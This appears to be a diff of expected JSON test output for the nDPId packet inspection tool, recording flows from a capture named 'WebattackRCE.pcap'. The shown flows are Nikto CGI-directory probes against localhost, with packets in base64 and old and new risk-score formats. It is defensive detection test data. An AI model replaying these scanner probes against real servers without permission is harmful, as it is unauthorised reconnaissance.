-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-915\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-915\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1576420276704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276704,"pkt":"AAAAAAAAAAAAAAAACABFAADAObpAAEAGAnx\/AAABfwAAAcHEH5ArBQGh2qRxvoAYAED+tAAAAQEICp1m+widZvsIR0VUIC9iaW4vIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1576420276705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276705,"pkt":"AAAAAAAAAAAAAAAACABFAADARJ1AAEAG95h\/AAABfwAAAcHGH5BoLnyEpCdA\/4AYAED+tAAAAQEICp1m+wmdZvsJR0VUIC9jZ2kvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1576420276707,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420276707,"pkt":"AAAAAAAAAAAAAAAACABFAADCUelAAEAG6kp\/AAABfwAAAcHIH5DIZGoAvjYJ64AYAED+tgAAAQEICp1m+wudZvsLR0VUIC9tcGNnaS8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQoNCg=="}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mpcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mpcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1576420276708,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276708,"pkt":"AAAAAAAAAAAAAAAACABFAADE7opAAEAGTad\/AAABfwAAAcHKH5CIytaS2kjlzYAYAED+uAAAAQEICp1m+wydZvsMR0VUIC9jZ2ktYmluLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1576420276710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276710,"pkt":"AAAAAAAAAAAAAAAACABFAADEp+BAAEAGlFF\/AAABfwAAAcHMH5C4I5\/IUy7GWoAYAED+uAAAAQEICp1m+w6dZvsNR0VUIC9vd3MtYmluLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ows-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ows-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1576420276711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276711,"pkt":"AAAAAAAAAAAAAAAACABFAADEXJRAAEAG351\/AAABfwAAAcHOH5AWt2SMpHJk2oAYAED+uAAAAQEICp1m+w+dZvsPR0VUIC9jZ2ktc3lzLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-sys\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-sys\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1576420276713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420276713,"pkt":"AAAAAAAAAAAAAAAACABFAADG5r1AAEAGVXJ\/AAABfwAAAcHQH5DCed6iQK2\/KYAYAED+ugAAAQEICp1m+xCdZvsQR0VUIC9jZ2ktbG9jYWwvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1576420276714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420276714,"pkt":"AAAAAAAAAAAAAAAACABFAADCR6dAAEAG9Ix\/AAABfwAAAcHSH5C\/OX\/AhojitYAYAED+tgAAAQEICp1m+xKdZvsSR0VUIC9odGJpbi8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
